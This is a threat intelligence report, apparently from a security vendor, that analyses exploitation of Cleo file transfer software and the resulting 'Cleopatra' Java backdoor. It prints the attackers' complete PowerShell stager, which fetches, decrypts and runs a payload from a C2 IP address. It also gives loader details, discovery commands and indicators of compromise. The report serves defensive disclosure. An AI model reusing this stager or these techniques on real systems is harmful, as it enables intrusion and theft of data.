Key Takeaways
- Cleo MFT products were exploited by threat actors to deploy a malicious PowerShell stager, culminating in the execution of a Java-based backdoor we are dubbing Cleopatra.
- The campaign began on 7 December 2024, and is ongoing as of the publication of this article.
- The Cleopatra backdoor supports in-memory file storage and is designed for cross-platform support across Windows and Linux. It implements functionality designed to access data stored within Cleo MFT software specifically.
- Although many IP addresses were used as C2 destinations, vulnerability scanning originated from only two IP addresses.
Summary
In December 2024, Arctic Wolf Labs observed a mass exploitation campaign involving Cleo Managed File Transfer (MFT) products for initial access. The execution chain involved an obfuscated PowerShell stager, a Java loader, and ultimately a Java-based backdoor, which we will refer to as Cleopatra.
In this article we will provide insight into the execution chain in this campaign, obfuscated malicious payloads deployed, and surrounding threat intelligence context around these activities.
Background
In 2023, ransomware threat actors were seen exploiting CVE-2023-34362 against the MOVEit Transfer MFT solution. Considering the exposure of such services over the public internet and their proximity to sensitive data, it is easy to understand why this type of software would be attractive to ransomware threat actors. Indeed, in late 2023 we predicted that there would be additional exploitation of MFT solutions in the future for the same reasons.
On 30 October 2024. Cleo published an advisory for CVE-2024-50623 (a vulnerability affecting Harmony, VLTrader, and LexiCom) which allows for unrestricted file upload and downloads on affected devices. This vulnerability was reportedly fixed in the 5.8.0.21 patch. However, organisations running the latest versions of the software at the time of the intrusions were confirmed to have been affected in the present campaign, suggesting the existence of a separate means of initial access.
What We Know About the Campaign
Timeline and Victimology
Starting on December 7, Arctic Wolf began responding to a cluster of malicious PowerShell activity on devices running Cleo MFT software. All three of the products mentioned in the previous section were affected. The threat activity was spread across various industries and appears to have been opportunistic in nature.
Vulnerability Scanning
Across all known instances of exploitation, there were corresponding network flows originating from two IP addresses:
38.180.51.138 - Artnet Sp. Z O.O. 45.182.189.225 - Datahome S.A.
Traffic from those IP addresses flowed through on ports 5080, 5081, 6080, and 443 in victim environments, most of which was TLS-encrypted. Consistent with independent reporting on the zero-day Cleo vulnerability, the URI /synchronization was accessed over HTTP by the source IP addresses referenced here.
Following exploitation attempts, the URI /temp/webserver-UUID_REDACTED.swp was accessed through GET HTTP requests originating from both IP addresses, although a HTTP status of 404 was returned in all observed instances, indicating that no content was returned. The UUID was in the standard RFC4122 canonical format and is referenced within the malicious PowerShell script.
Vulnerability scanning began in earnest on December 7 and is ongoing as of this writing.
Cleo Exploitation
Exploitation is performed through the autorun feature available in each Cleo product. Threat actors drop a file within the autorun directory which is automatically interpreted and executed. The mechanics of exploitation are detailed in recent reporting.
Consistent with recent research by Huntress, we observed instances of healthcheck.txt and healthchecktemplate.txt files being created on affected devices. Notably, in this example log, the system is running version 5.8.0.21 of Cleo LexiCom, which was fully patched at the time of the intrusion.
Note: Processing autorun file ‘autorun\healthchecktemplate.txt’. Warning: Lexicom is version 5.8.0.21, but importing files from VersaLex with an unknown version. Note: Import started for ‘temp\LexiCom##########.tmp’. Note: Importing ‘hosts\main.xml’ (4,500 kBytes)… Note: Import complete. Note: Processing autorun file ‘autorun\healthcheck.txt’ Run: type=“AutoRun” Command: SYSTEM cmd.exe /c "powershell -NonInteractive -EncodedCommand TRUNCATED_BASE64" Detail: SYSTEM cmd.exe /c "powershell -NonInteractive -EncodedCommand TRUNCATED_BASE64" Result: “Success” “Return status=0” End
As shown in the log above, this activity culminates in the execution of a malicious PowerShell script which we’ll review in the following section.
PowerShell Stager
In the intrusions we reviewed, execution of an obfuscated PowerShell or Bash script was observed. An example of an injected PowerShell script is shown below, executed as a shell command through cmd.exe /c:
cmd.exe /c \"powershell -NonInteractive $c=New-Object Net.Sockets.TcpClient("67.220.94.173", 443)
$s=$c.GetStream()
$s.ReadTimeout=10000
$w=New-Object System.IO.StreamWriter $s
$w.WriteLine("TLS v3 REDACTED_BASE64_UNIQUE_STRING")
$w.Flush()
$k=49,121,229,229,170,202,13,126,97,195,155,101,225,76,51,84
$a=New-Object System.Byte[] 9999
$f="cleo.3622"
$t=New-Object IO.FileStream($f, [IO.FileMode]::Create)
$n=$g=0
while(1){$r=$s.Read($a,0,9999)
if($r -le 0){break}
for($i=0;$i -lt $r;$i++){$j=$n++ -band 15
$a[$i]=$a[$i] -bxor $k[$j] -bxor $g
$g=($g+$a[$i]) -band 255
$k[$j]=($k[$j]+3) -band 255}
$t.Write($a,0,$r)}
$t.Close()
$w.Close()
$s.Close()
$env:QUERY=""
$env:F=$f
Start-Process -WindowStyle Hidden -FilePath jre\bin\java.exe - ArgumentList "-jar $f"
\" > webserver/temp/webserver-UUID_REDACTED.swp
This script performs the following actions:
- Establishes a connection to a C2 server over port 443, using the specified IP address (note: IP address varies depending on the intrusion).
- Sends a unique string of TLS V3 REDACTED_BASE64_UNIQUE_STRING to the C2 server, flushes the buffer, and attempts to download the next stage: a Java Loader.
- Each observed script has a unique 16-byte XOR key that is used to decrypt the payload from the C2 server.
- An environment variable is set with the name $QUERY and contains a unique encoded string. A separate environment variable, $f, is assigned a value of cleo.####.
- The next stage is a .jar file that is executed with java.exe -jar <file>. This JAR file follows the format of cleo.####.jar, using the environment variable from the previous step.
The last line of the script appears to be an attempt to redirect output from the command to a file that the threat actor would be able to retrieve over HTTP. Due to the right-angle bracket character > being escaped as a HTML entity, this redirection never takes place, potentially explaining why attempts to retrieve the file resulted in a 404 in the observed HTTP activity.
Java Loader
The Java loader takes the $QUERY environment variable that was set by the PowerShell stager, replaces several characters, and performs a base64 decode on it. The resulting decoded string is structured as follows:
- The first 16 bytes contains the AES key that is used to decrypt the final stage.
- The next 16 bytes are used as a unique seed that is base64-encoded and sent to the C2 server.
These bytes are sent in the same format as the PowerShell stager, TLS V3 REDACTED_BASE64_UNIQUE_STRING.
Then the payload is then downloaded from the C2 server and AES/CBC decrypted with the following extracted key and a hardcoded initialisation vector of:
aes_iv = { -51, 74, 84, -79, -108, -28, -118, 102, -47, -30, 93, -91, -111, 9, -48, 65 }
The downloaded payload is passed along to a custom class that unzips the payload and loads nine different java classes into a HashMap. The resulting decrypted Java classes are the final stage that will get executed at the end.
Once the final stage is unzipped and stored in memory, the loader starts to erase the initial downloaded file “cleo.####.jar” by first overwriting all the contents with NULL bytes, a known defense evasion technique used to evade forensic analysis. This file is ultimately deleted from disk by the final stage.
Finally, the loader finds the class called Cli and gets the constructor for the class so it can execute the final payload. The Cli class takes three arguments
// initial_C2: 67.220.94.173
// unique_id: VICTIM_IP_REDACTED_6080
constructor.newInstance(new Object[], { initial_C2, unique_id, cleo_file_name })
The initial_C2 and unique_id values were parsed from the base64-encoded string that was stored in the $QUERY environment variable earlier. The unique_id value observed was the public IP address of the victim machine followed by four digits.
Cleopatra Backdoor
We have dubbed the final Java payload Cleopatra Backdoor based on its Cleo-specific functionality.
The final stage payload consists of nine different Java classes:
- Cli
- Dwn
- DwnLevel
- Mos
- Proc
- ScSlot
- SFile
- Slot
- SrvSlot
The entry point to this malware is the Cli method of the Cli class, where it takes the cleo_file_name variable as var3 and deletes it completely from disk using PowerShell. The this.host variable takes in an initial_C2 value from the Java loader and uses that for further communication via the SrvSlot/ScSlot/Slot classes.
The cliid variable takes in the unique_id value from the Java loader and stores this value as a “sid” which is sent in the hello packet to the C2 server.
public Cli(String var1, String var2, String var3) {
try {
this.host = var1;
cliid = var2;
stage1fn = var3;
this.run();
runDelFileCmd(var3);
} catch (Exception var5) {
l("EX Cli " + var5.getMessage());
}
}
We identify a few notable capabilities within the decompiled backdoor source:
- The Proc class handles the “shell” access for Linux and Windows hosts. It can use either cmd /c or bash -c and execute a single command or perform a “remote shell” where it runs in a continuous loop and pipes the input/output streams for the commands.
- The Dwn/DwnLevel handle the in-memory file storage that can create zip folders and read/write to them.
- The SFile class is responsible for reading and writing to files on disk.
The Cleopatra backdoor contains a few other noteworthy filesystem references that are specific to Cleo software.
- Within the Proc class, a method called confParser() parses a file in conf/Top.xml. This method is used to gather a list of hosts and subdirectories of potential interest to the threat actor. The list of identified hosts is saved to hosts/hostfile for ease of retrieval. All subdirectories are stored in a HashMap and identified home directory paths are returned as output via the C2 interface. The list of subdirectories is:
- Defaulthomedir
- Ftprootpath
- Inbox
- Sentbox
- Outbox
- Mailbox
- Within the Proc class, a method called loadOptions() parses a configuration file in conf/Options.xml, which is specific to Cleo software as documented in Cleo’s Versalex Administrator Guide. The parsed parameters are stored in a HashMap object. This method is called from the confParser() method.
Discovery Commands
In the intrusions, basic discovery commands were utilised, such as the ones seen below:
- whoami
- systeminfo
- nltest /domain_trusts
- net view
- net session
- wmic localdisk get name, size
The commands listed were used by threat actors to gather information on the compromised host device as well as network connections that may be leveraged for pivoting to other devices.
How Arctic Wolf Protects Its Customers
Arctic Wolf is committed to helping customers end their cyber risk, and when active ransomware campaigns are identified we move quickly to protect our customers. From the beginning of this campaign, Arctic Wolf acted decisively to mitigate the risks to our customers.
Arctic Wolf Labs has leveraged threat intelligence around CVE-2024-50623 and related tactics from previous campaigns to implement new detections in the Aurora Platform to protect Arctic Wolf® Managed Detection and Response (MDR) customers.. As we discover any new information, we will enhance our detections to account for additional indicators of compromise and techniques leveraged by this threat actor.
Conclusion
As we predicted in 2023, MFT software continues to be an attractive target to threat actors in 2024. Considering the recent public disclosure of a proof-of-concept exploit for the Cleo zero-day vulnerability, exploitation is now expected to become more widespread. Now that a fix is available, organisations running Cleo software should upgrade to version 5.8.0.24 or newer as soon as possible.
Defenders should prioritise remote monitoring of server assets for unusual execution patterns (such as obfuscated PowerShell activity) to respond early in the execution chain before threat actors can act on their objectives.
Additionally, devices should be continuously audited for potential weaknesses in internet-accessible services, and vulnerable services should be kept off the public internet where possible to minimise the potential exposure in mass exploitation campaigns such as this one. This can be accomplished by IP access control lists, or by keeping applications behind a VPN to reduce the potential attack surface.
Acknowledgements
Arctic Wolf Labs would like to acknowledge members of the Security Services team for their role in identifying this campaign. We thank Cole Bosma who identified the campaign and associated TTPs, as well as Osaze Omoruyi and Mark Funcion who helped investigate the intrusions.
Appendix
Tactics, Techniques, and Procedures (TTPs)
| Tactic | Technique | Sub-techniques or Tools |
|---|---|---|
| Initial Access | T1190: Exploit Public-Facing Application | |
| Execution | T1059: Command and Scripting Interpreter | |
| Discovery | T1082: System Information Discovery | wmic logicaldisk get name,size |
| T1033: System Owner/User Discovery | whoami systeminfo |
|
| T1135: Network Share Discovery | net view | |
| T1049: System Network Connections | net session |
Vulnerabilities Exploited
| Vulnerability | Use |
|---|---|
| Undeclared CVE | Threat actor has been observed utilising an vulnerability with an undeclared CVE (related to CVE-2024-50623) for initial access. |
Indicators of Compromise (IoCs)
| Indicator | Type | Description |
|---|---|---|
| 185.181.230[.]115 | IPv4 Address | AS60602 – Inovare-Prim Srl C2 Server |
| 80.67.5[.]133 | IPv4 Address | AS42708 – Glesys Ab C2 Server |
| 5.181.158[.]25 | IPv4 Address | AS39798 – Mivocloud Srl C2 Server |
| 188.214.30[.]105 | IPv4 Address | AS51177 – Tipzor Media Srl C2 Server |
| 216.245.221[.]83 | IPv4 Address | AS46475 – Limestone Networks Inc. C2 Server |
| 176.123.4[.]50 | IPv4 Address | AS200019 – Alexhost Srl C2 Server |
| 185.162.128[.]133 | IPv4 Address | AS14576 – Hosting Solution Ltd. C2 Server |
| 184.107.3[.]70 | IPv4 Address | AS32613 – Leaseweb Canada Inc. C2 Server |
| 45.140.143[.]68 | IPv4 Address | AS212477 – Royalehosting Bv C2 Server |
| 195.123.224[.]8 | IPv4 Address | AS59729 – Green Floid Llc C2 Server |
| 184.107.3[.]196 | IPv4 Address | AS32613 – Leaseweb Canada Inc. C2 Server |
| 92.51.2[.]221 | IPv4 Address | AS209588 – Flyservers S.A. C2 Server |
| 67.220.94[.]173 | IPv4 Address | AS40065 – Cnservers Llc C2 Server |
| 192.119.99[.]42 | IPv4 Address | AS54290 – Hostwinds Llc. C2 Server |
| 184.107.3[.]196 | IPv4 Address | AS32613 – Leaseweb Canada Inc. C2 Server |
| 185.162.128[.]100 | IPv4 Address | AS14576 – Hosting Solution Ltd. C2 Server |
| 5.149.254[.]109 | IPv4 Address | AS59711 – Hz Hosting Ltd C2 Server |
| 92.51.2[.]244 | IPv4 Address | AS209588 – Flyservers S.A. C2 Server |
| 95.216.35[.]219 | IPv4 Address | AS24940 – Hetzner Online Gmbh C2 Server |
| 45.182.189[.]225 | IPv4 Address | AS273045 – Datahome S.A. Vulnerability Scanner and C2 Server |
| 38.180.51[.]138 | IPv4 Address | AS200088 – Artnet Sp. Z O.O. Vulnerability Scanner and C2 Server |
| 6705EEA898EF1155417361FA71B1078B7AAAB61E7597D2A080AA38DF4AD87B1C | SHA256 | Java Loader (cleo.####.jar) |
| healthcheck.txt | Filename | Malicious Cleo autorun filename |
| healthchecktemplate.txt | Filename | Malicious Cleo autorun filename |
Detection Opportunities
As part of our MDR service, Arctic Wolf has detections in place for techniques described in this blog article, in addition to other techniques employed by threat actors described here.
Network
Network detection is challenging considering that MFT services typically run with TLS-encryption enabled, as opposed to using plaintext HTTP. On the other hand, for organisations that do not expect traffic from the network providers or IP addresses in the IOC table above, alerting can be considered for such traffic regardless of whether the contents are encrypted or not.
Note that all C2 server IP addresses were confirmed to originate from ASNs classified as hosting, as opposed to consumer ISPs.
Endpoint
There are several potential detection opportunities for this threat at the endpoint level. Encoded and obfuscated PowerShell should be treated with suspicion, with filtering in place for expected activities that fit this description.
Additionally, unexpected processes spawned from child processes of the Java-hosted Cleo services should be highlighted for potential exploitation activity.
As part of our Managed Detection and Response service, Arctic Wolf has detections in place for this technique, in addition to other techniques employed by this threat actor.
Additional Resources
Get actionable insights and access to the security operations expertise of one of the largest security operations centers (SOCs) in the world in Arctic Wolf’s 2024 Security Operations Report.
Learn what’s new, what’s changed, and what’s ahead for the cybersecurity landscape, with insights from 1,000 global IT and security leaders in the Arctic Wolf State of Cybersecurity: 2024 Trends Report.
About Arctic Wolf Labs
Arctic Wolf Labs is a group of elite security researchers, data scientists, and security development engineers who explore security topics to deliver cutting-edge threat research on new and emerging adversaries, develop and refine advanced threat detection models with artificial intelligence, including machine learning, and drive continuous improvement in the speed, scale, and detection efficacy of Arctic Wolf’s solution offerings. With their deep domain knowledge, Arctic Wolf Labs brings world-class security innovations to not only Arctic Wolf’s customer base, but the security community at large.
Authors
Stefan Hostetler
Stefan is a Lead Threat Intelligence Researcher at Arctic Wolf. With over a decade of industry experience under his belt, he focuses on extracting actionable insight from novel threats to help organisations protect themselves effectively.
Julian Tuin
Julian is a Senior Threat Intelligence Researcher at Arctic Wolf Labs with more than 6 years of industry experience. He has experience in identifying and tracking campaigns for new and emerging threats.
Aaron Diaz
Aaron is a Lead Security Researcher at Arctic Wolf Labs focusing on malware analysis and detection research. He has more than 8 years of experience in the industry with a background in threat hunting, malware analysis/development and vulnerability research. Aaron has passion for novel threat research and adversary tradecraft.
Jon Grimm
Jon is a Threat Intelligence Analyst at Arctic Wolf dedicated to identifying new cyber threats and producing actionable intelligence that enhances organisational defenses. He has background of 10 years’ experience in several domains of cybersecurity, holds a bachelor’s degree in law enforcement, and holds several industry certifications (CISSP, GCFA, GCTI).
Cole Bosma
Cole Bosma is a Triage Security Engineer 3 at Arctic Wolf, with over 6 years of experience in cybersecurity. With a Master’s degree in Cyber Defense and a CISSP certification, he specializes in incident response and threat detection, ensuring robust protection for Arctic Wolf’s customers.
